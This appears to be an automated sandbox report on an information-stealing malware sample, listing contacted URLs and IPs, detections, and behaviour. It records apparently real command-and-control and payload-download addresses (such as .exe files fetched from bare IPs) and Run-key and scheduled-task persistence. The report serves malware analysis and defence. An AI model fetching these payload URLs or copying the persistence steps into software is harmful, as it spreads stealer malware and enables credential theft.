https://www.youtube.com/	4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.0000000001518000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://31.41.244.11/files/file1.exeJ	skotes.exe, 00000017.00000002.3297166595.000000000148B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://fadehairucw.store/N	4136f86ac7.exe, 00000025.00000003.2988825981.00000000014EB000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.fa	4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206I5i	file.exe, 00000000.00000002.2412929391.00000000010AE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/recaptcha/	4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.0000000001518000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	false		high
https://checkout.steampowered.com/	4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003704731.0000000001518000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3096841796.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3191846589.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3095820288.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3091523965.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3004302164.0000000001524000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3079259497.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3094627589.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3094047183.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3139784082.0000000001517000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3072686182.0000000001517000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	file.exe, 00000000.00000003.2328896938.000000002384F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	file.exe, 00000000.00000002.2441472631.0000000023721000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2787061831.000000000137C000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3109019791.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	file.exe, 00000000.00000002.2441472631.0000000023721000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2797891117.0000000001378000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2797500848.0000000001374000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3109019791.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/def.exe	4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3192063647.0000000001564000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000002.3262095718.000000000155F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=g2Zx7e0yBV_M&l=english	4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	false		high
https://crisiwarny.store/	4136f86ac7.exe, 00000025.00000003.2988825981.00000000014EB000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://crisiwarny.store/8	4136f86ac7.exe, 00000025.00000003.2988825981.00000000014EB000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1	4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com//	4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A88000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpS	skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://presticitpo.store/h	4136f86ac7.exe, 00000025.00000003.2988825981.00000000014EB000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.2988565217.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/c4becf79229cb002.phpZ	4136f86ac7.exe, 00000025.00000002.3262095718.0000000001507000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://marshal-zhukov.com/apiw	4136f86ac7.exe, 0000001E.00000003.2903431989.0000000005606000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://marshal-zhukov.com/(	4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.43/Zu7JuNko/index.phpX	skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/c4becf79229cb002.phpd	file.exe, 00000000.00000002.2412929391.0000000001122000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.16/luma/random.exey	skotes.exe, 00000017.00000002.3297166595.0000000001551000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.206/c4becf79229cb002.php/o	4136f86ac7.exe, 0000001E.00000002.3123970475.00000000055F2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/c4becf79229cb002.phpa	4136f86ac7.exe, 0000001E.00000002.3123970475.00000000055F2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://help.steampowered.com/en/	4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	file1.exe, 00000018.00000003.2787061831.000000000137C000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3090918742.0000000005CAC000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3109019791.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/steam/random.exep	4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://marshal-zhukov.com/apii	4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://marshal-zhukov.com/apih	4136f86ac7.exe, 00000025.00000003.3119814255.0000000001580000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3191607562.0000000001580000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.43/Zu7JuNko/index.phpD	skotes.exe, 00000017.00000002.3297166595.000000000150A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.php1t#	file.exe, 00000000.00000002.2412929391.0000000001180000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://crisiwarny.store:443/apiv	4136f86ac7.exe, 00000025.00000003.2988565217.00000000014D5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://recaptcha.net/recaptcha/;	4136f86ac7.exe, 00000025.00000003.3003704731.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.phpr	4136f86ac7.exe, 00000025.00000002.3262095718.0000000001507000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=ftiDdX_V0QeB&l=englis	4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865595953.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3025496327.0000000001568000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3003567788.0000000001558000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.php%WpO	3160604f40.exe, 0000001F.00000002.2929444481.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://presticitpo.store/api	4136f86ac7.exe, 00000025.00000003.2988565217.00000000014D5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/c4becf79229cb002.phpv	4136f86ac7.exe, 00000025.00000002.3262095718.0000000001507000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://marshal-zhukov.com/apis	4136f86ac7.exe, 00000025.00000003.3072686182.0000000001517000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
13.107.246.40	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
142.251.40.129	unknown	United States	15169	GOOGLEUS	false
172.67.174.133	frogmen-smell.sbs	United States	13335	CLOUDFLARENETUS	true
162.159.61.3	unknown	United States	13335	CLOUDFLARENETUS	false
23.219.161.135	unknown	United States	20940	AKAMAI-ASN1EU	false
23.197.127.21	unknown	United States	20940	AKAMAI-ASN1EU	true
142.250.186.110	play.google.com	United States	15169	GOOGLEUS	false
20.110.205.119	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
192.64.117.218	freewaylumma.online	United States	22612	NAMECHEAP-NETUS	true
18.244.18.32	sb.scorecardresearch.com	United States	16509	AMAZON-02US	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
216.58.206.46	plus.l.google.com	United States	15169	GOOGLEUS	false
23.219.82.80	unknown	United States	20940	AKAMAI-ASN1EU	false
23.210.122.61	steamcommunity.com	United States	16625	AKAMAI-ASUS	false
142.250.185.196	www.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
20.75.60.91	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
5.79.74.169	unknown	Netherlands	60781	LEASEWEB-NL-AMS-01NetherlandsNL	false
20.189.173.13	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
108.139.47.33	unknown	United States	16509	AMAZON-02US	false
23.219.82.51	unknown	United States	20940	AKAMAI-ASN1EU	false
204.79.197.219	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
172.64.41.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
31.41.244.11	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	false
94.245.104.56	ssl.bingadsedgeextension-prod-europe.azurewebsites.net	United Kingdom	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
104.117.182.72	unknown	United States	20940	AKAMAI-ASN1EU	false
176.9.192.202	cl.oud-cdn.de	Germany	24940	HETZNER-ASDE	false
188.114.96.3	marshal-zhukov.com	European Union	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.5
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1554046
Start date and time:	2024-11-12 00:05:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	41
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@95/332@65/32
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 216.58.206.35, 142.250.185.78, 173.194.76.84, 34.104.35.123, 142.250.185.195, 142.250.186.138, 142.250.184.202, 142.250.186.74, 142.250.185.138, 142.250.74.202, 142.250.185.170, 142.250.185.234, 172.217.18.106, 172.217.16.202, 172.217.18.10, 142.250.186.42, 142.250.185.202, 142.250.186.106, 142.250.186.170, 142.250.185.74, 142.250.181.234, 142.250.184.234, 216.58.212.138, 142.250.185.106, 216.58.206.74, 216.58.206.42, 172.217.16.138, 172.217.23.106, 216.58.212.170, 13.107.42.16, 204.79.197.203, 204.79.197.239, 13.107.21.239, 142.250.185.110, 13.107.6.158, 2.19.126.152, 2.19.126.145, 93.184.221.240, 172.205.25.163, 192.229.221.95, 88.221.110.179, 88.221.110.195, 2.23.209.189, 2.23.209.140, 2.23.209.187, 2.23.209.130, 2.23.209.182, 2.23.209.185, 2.23.209.176, 2.23.209.149, 2.23.209.179, 13.107.21.237, 204.79.197.237, 13.74.129.1, 2.23.209.55, 2.23.209.2, 2.23.209.52, 2.23.209.43, 2.23.209.47, 2.23.209.59, 2.23.209.41, 2.23.209.50, 2.23.209.48, 2.19.126.151, 2.19.126.157
Excluded domains from analysis (whitelisted): cdp-f-ssl-tlu-net.trafficmanager.net, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, clientservices.googleapis.com, prod-agic-cu-1.centralus.cloudapp.azure.com, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, www.gstatic.com, prod-agic-ne-9.northeurope.cloudapp.azure.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, ogads-pa.googleapis.com, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, wildcardtlu-ssl.azureedge.net, edgedl.me.gvt1.com, c.bing.com, clients.l.google.com, config.edge.skype.com.t
HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
00:06:35	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
00:07:25	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 4136f86ac7.exe C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe
00:07:33	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 3160604f40.exe C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe
00:07:41	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 0ac2a0f3ae.exe C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe
00:07:50	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 4136f86ac7.exe C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe
00:08:00	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 3160604f40.exe C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe
00:08:08	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 0ac2a0f3ae.exe C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe
18:06:31	API Interceptor	12x Sleep call for process: file.exe modified
18:07:01	API Interceptor	36310x Sleep call for process: skotes.exe modified
18:07:11	API Interceptor	7x Sleep call for process: file1.exe modified
18:07:11	API Interceptor	89x Sleep call for process: powershell.exe modified
18:07:21	API Interceptor	46x Sleep call for process: 4136f86ac7.exe modified
18:07:43	API Interceptor	76x Sleep call for process: 3160604f40.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
13.107.246.40	Payment Transfer Receipt.shtml	Get hash	malicious	HTMLPhisher	Browse	www.aib.gov.uk/
	NEW ORDER.xls	Get hash	malicious	Unknown	Browse	2s.gg/3zs
	PO_OCF 408.xls	Get hash	malicious	Unknown	Browse	2s.gg/42Q
	06836722_218 Aluplast.docx.doc	Get hash	malicious	Unknown	Browse	2s.gg/3zk
	Quotation.xls	Get hash	malicious	Unknown	Browse	2s.gg/3zM

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
steamcommunity.com	file.exe	Get hash	malicious	LummaC	Browse	23.197.127.21
	file.exe	Get hash	malicious	LummaC	Browse	23.192.247.89
	file.exe	Get hash	malicious	LummaC	Browse	23.192.247.89
	file.exe	Get hash	malicious	LummaC	Browse	23.192.247.89
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	23.192.247.89
	file.exe	Get hash	malicious	LummaC	Browse	23.192.247.89
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	23.192.247.89
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	23.192.247.89
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	23.197.127.21
	file.exe	Get hash	malicious	LummaC	Browse	23.192.247.89
chrome.cloudflare-dns.com	Setup.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.64.41.3
	SAFAIR - MDE_File_Sample_c4fda6eee21550785a1c89ce291a2d3072e0ed9b.zip	Get hash	malicious	Unknown	Browse	162.159.61.3
	rPO3799039985.exe	Get hash	malicious	Remcos, GuLoader	Browse	172.64.41.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.64.41.3
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	A3W2CpXxiO.exe	Get hash	malicious	Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
frogmen-smell.sbs	file.exe	Get hash	malicious	LummaC	Browse	172.67.174.133

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Setup.exe	Get hash	malicious	Unknown	Browse	1.1.1.1
	allpdfpro.msi	Get hash	malicious	Unknown	Browse	1.1.1.1
	BlackLizard3_crypted_LAB.exe	Get hash	malicious	LummaC	Browse	172.67.196.146
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	https://xblgo.com	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://u34251876.ct.sendgrid.net/ls/click?upn=u001.ordJ57g0HVndDa8Km-2BVUUFN1eIn5tdzIxrKbgsGfF9eVdl7b-2Fab-2BrUBdfIXH9yijR5LLM7kgivkgUI3nC3VajM00UDrq4ekI2XREqo0QmHcHyDyYWomvx9-2FHEtQ3o5rBM9AHzVSsjnwFSEJqic-2BEtw-3D-3DBxNa_qINdfz5Lp8EahgxJXfgGV-2Bk7caEgTUs2gtUTKNMgBkZ9mbVIMd-2B1UUN0TqdRRGrocW81C18onNWNx5Y6KM88Rr7odKCqMhALUPuUbXGlkOo01sEKeKdphXRhykHXKfSB-2By1s-2BNAgCL9-2BbtY8LNaKNV0sXQnlv-2F9fA-2BLZtaeadaVGHb32bFHhcOwS3ltfr2dig92MY6M8DrwwYiolgI1k4Q-3D-3D	Get hash	malicious	Unknown	Browse	104.17.24.14
	https://share365doc-hrabaddqf5fahba5.z03.azurefd.net/lastestbolodoc/doc.html	Get hash	malicious	HTMLPhisher	Browse	172.67.222.69
	file.exe	Get hash	malicious	LummaC	Browse	172.67.174.133
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
